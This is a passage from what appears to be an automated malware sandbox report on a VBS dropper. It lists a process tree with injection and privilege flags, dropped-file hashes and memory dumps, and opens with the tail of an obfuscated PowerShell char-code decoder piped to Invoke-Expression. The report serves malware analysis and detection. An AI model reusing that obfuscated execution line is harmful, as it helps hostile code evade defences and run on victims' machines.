6,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($88599686864747748383993984)|I`E`X1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\calc.exe"{Path}"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbsMD5
4ad0ded9fbe4dc4c75e9af8f48274dc7
SHA1e5cbe8b8fe9fa5d7ace2fa7927041a4ae76e3689
SHA2563b9826a055e76a1f7ba6339e0f483cc887e1e2a792f39ba0dab041367f5b5b16
SHA512272ea2f7bae603b092d7d4065caf600f8d4b872564fc7c84e53e27f1c30281fc4b9550428b4bfe8fc8a6914a438da52128cebe4de6c649e413b6bf71e0ce7480
-
memory/1404-80-0x0000000006C20000-0x0000000006D93000-memory.dmpFilesize
1.4MB
-
memory/1404-87-0x0000000007770000-0x00000000078FB000-memory.dmpFilesize
1.5MB
-
memory/1480-74-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/1480-75-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/1480-76-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/1480-78-0x0000000000AE0000-0x0000000000DE3000-memory.dmpFilesize
3.0MB
-
memory/1480-79-0x0000000000180000-0x0000000000195000-memory.dmpFilesize
84KB
-
memory/1540-82-0x0000000000460000-0x000000000047F000-memory.dmpFilesize
124KB
-
memory/1540-83-0x00000000000C0000-0x00000000000EF000-memory.dmpFilesize
188KB
-
memory/1540-86-0x0000000001E90000-0x0000000001F24000-memory.dmpFilesize
592KB
-
memory/1540-84-0x0000000001F90000-0x0000000002293000-memory.dmpFilesize
3.0MB
-
memory/1608-88-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1608-55-0x00000000720A1000-0x00000000720A4000-memory.dmpFilesize
12KB
-
memory/1608-57-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1608-56-0x000000006FB21000-0x000000006FB23000-memory.dmpFilesize
8KB
-
memory/1608-58-0x0000000075AB1000-0x0000000075AB3000-memory.dmpFilesize
8KB
-
memory/1900-65-0x0000000002872000-0x0000000002874000-memory.dmpFilesize
8KB
-
memory/1900-73-0x00000000028A4000-0x00000000028A5000-memory.dmpFilesize
4KB
-
memory/1900-71-0x000000000289E000-0x000000000289F000-memory.dmpFilesize
4KB
-
memory/1900-72-0x000000000289F000-0x00000000028A0000-memory.dmpFilesize
4KB
-
memory/1900-70-0x00000000028A1000-0x00000000028A2000-memory.dmpFilesize
4KB
-
memory/1900-69-0x00000000028A2000-0x00000000028A4000-memory.dmpFilesize
8KB
-
memory/1900-68-0x000000000287B000-0x000000000289A000-memory.dmpFilesize
124KB
-
memory/1900-67-0x000000001B720000-0x000000001BA1F000-memory.dmpFilesize
3.0MB
-
memory/1900-63-0x000007FEF26B0000-0x000007FEF320D000-memory.dmpFilesize
11.4MB
-
memory/1900-66-0x0000000002874000-0x0000000002877000-memory.dmpFilesize
12KB
-
memory/1900-64-0x0000000002870000-0x0000000002872000-memory.dmpFilesize
8KB
-
memory/1900-62-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmpFilesize
8KB